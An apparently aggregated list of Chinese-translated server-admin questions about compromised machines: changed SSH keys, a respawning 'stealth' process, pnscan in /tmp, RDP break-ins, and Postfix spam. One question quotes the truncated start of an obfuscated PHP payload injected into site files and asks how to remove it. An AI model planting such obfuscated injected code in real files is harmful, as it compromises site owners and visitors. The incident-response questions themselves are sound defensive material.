那些遇到过的问题

相关疑难解决方法(0)

我的机器上的漏洞

可能重复:
我的服务器被黑了 紧急情况

突然,ssh 声称我服务器上的密钥已更改。

由于更改了密钥,甚至 freenx 也不再接受我的连接。

反正没有什么重要的。

但是我如何验证它是否被破坏?

谢谢

ssh keys intrusion-detection

use*_*812
2017 04-13
2
推荐指数
1
解决办法
183
查看次数

如何防止黑客将文件上传到ftp服务器

可能重复:
我的服务器被黑了 紧急情况

我一直在用 .net framework 3.5 设计一个 asp.net 站点,一切都很好,直到我的站点突然被黑,它说一个中文组和一些其他文字图片 jpg 他们将文件放入 ft​​p 服务器我删除它们然后他们再次放入我更改了所有密码,他们又做了一次我认为他们是一些脚本程序员,我无法通过删除方法做任何事情,请帮助我。

hacking asp.net

Kam*_*iar
2017 04-13
1
推荐指数
1
解决办法
1296
查看次数

使用 sed 或 diff 从所有文件中排除黑客代码

可能重复:
我的服务器被黑了 紧急情况

你好,

我迫切需要您的帮助,因为服务器已被黑客入侵,而且我没有时间学习如何从所有文件中删除黑客的代码。我附上了添加到所有文件的代码。这段代码中有很多特殊字符,而且相当大。它有时会两次添加到文件中。

我不知道 sed 能很好地解决这个问题。如何从所有文件中排除这段代码?使用 sed、diff/patch 或其他技术?

这是要删除的部分代码:

    <?php global $ob_starting;
if(!$ob_starting) {
   function ob_start_flush($s) {
        $tc = array(0, 69, 83, 84, 82, 67, 7, 79, 9, 8, 23, 73, 12, 76, 68, 78, 63, 24, 14, 19, 3, 65, 27, 17, 85, 70, 80, 16, 29, 11, 89, 86, 2, 66, 77, 93, 91, 71, 18, 72, 20, 75, 87, 22, 74, 13, 59, 61, 52, 37, 28, 35, 15, 1, 21, 25, 34, 92, 36, …
Run Code Online (Sandbox Code Playgroud)

bash

And*_*rew
2017 04-13
1
推荐指数
1
解决办法
360
查看次数

Linux 隐身过程

我有一个名为“stealth”的进程,它感染了我的服务器(猛击我的 CPU),我不知道在哪里永久删除它。每次我终止进程时,它都会以某种方式重新启动......

ps -ef | grep stealth 给我这个:

ps显示隐身过程

但我不知道 ./stealth 会在哪里,因为它是一个相对路径?

此外,当我尝试使用locateor 时find,我什么也得不到。

任何想法如何找到和删除此过程?

linux centos malware process stealth

Jes*_*nch
lucky-day
1
推荐指数
1
解决办法
4972
查看次数

服务器被黑 + 巨大的带宽使用高峰

可能重复:
我的服务器被黑了 紧急情况

我通过 Rackspace Cloud Server 在 Ubuntu 上运行了几个站点。我的站点通常每天使用大约 3 GB 的出站带宽。今天,我震惊地发现,在过去的一周里,我的服务器每天记录 2 TB的出站带宽。这显然是完全不正常的,让我失去了一条胳膊和一条腿。有趣的是,awstats 显示我的网站一直在使用典型的带宽量,因此是其他原因导致了这种荒谬的峰值。

我怀疑我的网站被黑了。我运行了 root 检查,浏览了我的服务器日志,并没有发现任何可疑之处。你们对我还能做些什么来解决这个问题有什么想法吗?

ubuntu bandwidth hacking apache-2.2

wei*_*ool
2017 04-13
1
推荐指数
1
解决办法
774
查看次数

如何防止黑客攻击 SQL Server 2008 R2?

我在日志文件查看器中检查了我的 SQL Server 2008R2 日志,发现来自中国的人一直试图以“SA”身份登录,但当然失败了。

有没有办法防止这些黑客攻击我的服务器?

提前致谢。

在此处输入图片说明

sql-server-2008

作者
2012 08-07
1
推荐指数
1
解决办法
1111
查看次数

端口 3389 上的可疑活动。我的系统是否已被入侵?

可能的重复:
如何处理受感染的服务器?

今天我打开了 TCPView 以查看是什么导致了大量出站网络活动,并且只能在端口 3389(据我所知是远程桌面使用的端口)上识别 svchost.exe。

我几乎立即结束了这个过程。

我搜索了它所连接的 IP 地址,发现它来自韩国。

我刚刚在“应用程序和服务日志 > Microsoft > Windows > TerminalServices-RemoteConnectionManager”下的 Windows 事件查看器中发现了近 2,000 个事件,其内容类似于:

Remote Desktop Services: User authentication succeeded:

User: administrator
Domain: 
Source Network Address: 1.214.253.235
Run Code Online (Sandbox Code Playgroud)

我想知道我的系统是否确实受到了损害,以及我是否有可能跟踪任何活动;比如文件访问。

为防止将来发生这种情况而采取的最佳行动方案是什么?或者我没有什么可担心的。

security rdp windows-7

Ter*_*ert
2017 04-13
1
推荐指数
1
解决办法
1070
查看次数

如何阻止当前在我的服务器上运行的恶意端口扫描程序?

我目前正在尝试清理和保护运行 pnscan 的服务器。这个 pnscan 实例是由最有可能使用我们的服务器作为端口扫描僵尸网络一部分的外部方安装的。它似乎能够将它的二进制文件写入/dev/shm 和/tmp。

这是“lsof | grep pnscan”的输出:

root@xxx.xxxx.xxx:/home/bitnami# lsof | grep pnscan
pnscan     9588     daemon  cwd       DIR    8,1      4096      647169 /tmp
pnscan     9588     daemon  rtd       DIR    8,1      4096      2      /
pnscan     9588     daemon  txt       REG    8,1      18468     647185 /tmp/pnscan
pnscan     9588     daemon  mem       REG    8,1      42572     418331 /lib/tls/i686/nosegneg/libnss_files-2.11.1.so
pnscan     9588     daemon  mem       REG    8,1    1421892     418349 /lib/tls/i686/nosegneg/libc-2.11.1.so
pnscan     9588     daemon  mem       REG    8,1      79676     418329 /lib/tls/i686/nosegneg/libnsl-2.11.1.so
pnscan     9588     daemon  mem       REG    8,1     117086     418343 /lib/tls/i686/nosegneg/libpthread-2.11.1.so
pnscan     9588 …
Run Code Online (Sandbox Code Playgroud)

security linux botnet

作者
2013 12-18
1
推荐指数
1
解决办法
1210
查看次数

我的 Postfix 是否在发送垃圾邮件?

在我的 Rsys 日志中,我收到了不是由我的服务器发起的奇怪电子邮件请求:

Nov 17 09:32:18 localhost postfix/qmgr[21748]: 8E52272C09: from=<>, size=33770, nrcpt=1 (queue active)
Nov 17 09:32:18 localhost postfix/qmgr[21748]: 15E6472BE2: from=<>, size=36706, nrcpt=1 (queue active)
Nov 17 09:32:18 localhost postfix/qmgr[21748]: AB7F672BE6: from=<>, size=36159, nrcpt=1 (queue active)
Nov 17 09:32:18 localhost postfix/qmgr[21748]: 723D672C0A: from=<>, size=33263, nrcpt=1 (queue active)
Nov 17 09:32:20 localhost postfix/smtp[27598]: 8E52272C09: to=<yuliy.kirillov@narad.crimea.com>, relay=mail.crimea.com[80.245.112.5]:25, delay=6902, delays=6900/0.02/2.3/0, dsn=4.7.1, status=deferred (host mail.crimea.com[80.245.112.5] refused to talk to me: 554 5.7.1 Service unavailable; Client host blocked using b.barracudacentral.org)
Nov 17 09:32:48 localhost postfix/smtp[27600]: …
Run Code Online (Sandbox Code Playgroud)

linux email-server postfix spam

inf*_*ity
lucky-day
1
推荐指数
1
解决办法
732
查看次数

我的邮件服务器使用我的域发送大量垃圾邮件

大量垃圾邮件通过我的邮件服务器发送。垃圾邮件使用不属于注册用户的别名。mailq命令输出显示如下消息:

487A1600698C2 1901 星期五 Jan 27 09:35:15 desarae_leclerc@mydomain.com (主机 mx-eu.mail.am0.yahoodns.net[188.125.69.79] 说:421 4.7.0 [TSS04] 来自 www.xxx.yyy 的消息。 zzz 由于用户投诉而暂时推迟 - 4.16.55.1;请参阅 https://help.yahoo.com/kb/postmaster/SLN3434.html(回复 MAIL FROM 命令)) h.anseur@yahoo.fr

491A4600698AE 1265 Fri Jan 27 09:36:43 www-data@mail.mydomain.com (递送暂时暂停:发送 RCPT TO 时与 mta5.am0.yahoodns.net[66.196.118.36] 失去连接) ejbmarine_chik20@yahoo.com

4888D600698B9 1280 Fri Jan 27 09:34:58 www-data@mail.mydomain.com (递送暂时暂停:发送 RCPT TO 时与 mta5.am0.yahoodns.net[66.196.118.36] 失去连接) tiff549@yahoo.com

正如您所看到的,即使用户 www-data 也在发送垃圾邮件。我运行命令postsuper -d ALL来删除所有队列电子邮件,但这也包括有效的电子邮件。

我使用 /etc/postfix/sender_access 将所有别名或未经授权的发件人列入黑名单,实际上该文件有超过 8000 个条目

这是postconf -n命令的输出

alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliasesappend_dot_mydomain
= no
biff …

email-server postfix spam

Emi*_*aga
2017 01-30
1
推荐指数
1
解决办法
6849
查看次数

标签 统计

linux ×3

email-server ×2

hacking ×2

postfix ×2

security ×2

spam ×2

apache-2.2 ×1

asp.net ×1

bandwidth ×1

bash ×1

botnet ×1

centos ×1

intrusion-detection ×1

keys ×1

malware ×1

process ×1

rdp ×1

sql-server-2008 ×1

ssh ×1

stealth ×1

ubuntu ×1

windows-7 ×1